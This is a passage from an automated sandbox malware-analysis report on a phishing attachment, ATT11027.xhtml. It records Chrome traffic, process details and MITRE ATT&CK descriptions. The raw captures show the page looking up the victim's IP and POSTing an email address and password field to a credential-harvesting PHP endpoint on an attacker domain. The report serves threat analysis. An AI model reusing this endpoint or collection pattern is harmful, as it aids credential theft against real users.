2025-03-20 22:54:20 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:20 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-20 22:54:20 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.24	60886	104.26.12.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:20 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:54:20 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:20 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238ca74397b58c1-EWR server-timing: cfL4;desc="?proto=TCP&rtt=98225&min_rtt=97858&rtt_var=21204&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=37623&cwnd=250&unsent_bytes=0&cid=fef367fc657cfed8&ts=256&x=0"
2025-03-20 22:54:20 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.24	60887	104.168.138.190	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:47 UTC	634	OUT	POST /gtk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 35 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:54:47 UTC	35	OUT	Data Raw: 61 69 3d 6f 6d 62 75 64 73 6d 61 6e 25 34 30 6f 6d 62 75 64 73 6d 61 6e 2e 67 6f 76 2e 61 75 26 70 72 3d Data Ascii: ai=ombudsman%40ombudsman.gov.au&pr=
2025-03-20 22:54:47 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:47 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=dcc28b14e8f66e240f221ff245163a56; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-20 22:54:47 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.24	60889	104.26.13.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:47 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:54:47 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:47 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238cb1b7e0a37a9-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97386&min_rtt=97205&rtt_var=20783&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=38089&cwnd=238&unsent_bytes=0&cid=05ad32fec8ed726b&ts=250&x=0"
2025-03-20 22:54:47 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.24	60891	104.26.12.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:47 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:54:48 UTC	434	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:48 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238cb1e8eac72b3-EWR server-timing: cfL4;desc="?proto=TCP&rtt=103515&min_rtt=102216&rtt_var=23515&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=35098&cwnd=242&unsent_bytes=0&cid=c09b2d034d26297c&ts=265&x=0"
2025-03-20 22:54:48 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.24	60890	104.168.138.190	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:48 UTC	441	OUT	GET /gtk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=be98e5d8659715f09c19881ed0e36b6f
2025-03-20 22:54:49 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:49 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-20 22:54:49 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 1880, Parent PID: 1224

Function Logs

General

Target ID:	0
Start time:	18:52:47
Start date:	20/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff7c0720000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Registry Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

COM Activities

WMI Operations

Show Windows behavior

Process Activities

Process Created

Process Terminated

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Token Activities

Token Adjusted

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 692, Parent PID: 1880

Function Logs

General

Target ID:	1
Start time:	18:52:48
Start date:	20/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1904,i,14389278284596491628,1559967262016630819,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2192 /prefetch:11
Imagebase:	0x7ff7c0720000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6352, Parent PID: 1224

Function Logs

General

Target ID:	4
Start time:	18:52:54
Start date:	20/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\ATT11027.xhtml"
Imagebase:	0x7ff7c0720000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

File Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

Process Terminated

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ATT11027.xhtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Static File Info

General

Static OLE Info

General

OLE File "ATT11027.xhtml"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Windows Analysis Report
ATT11027.xhtml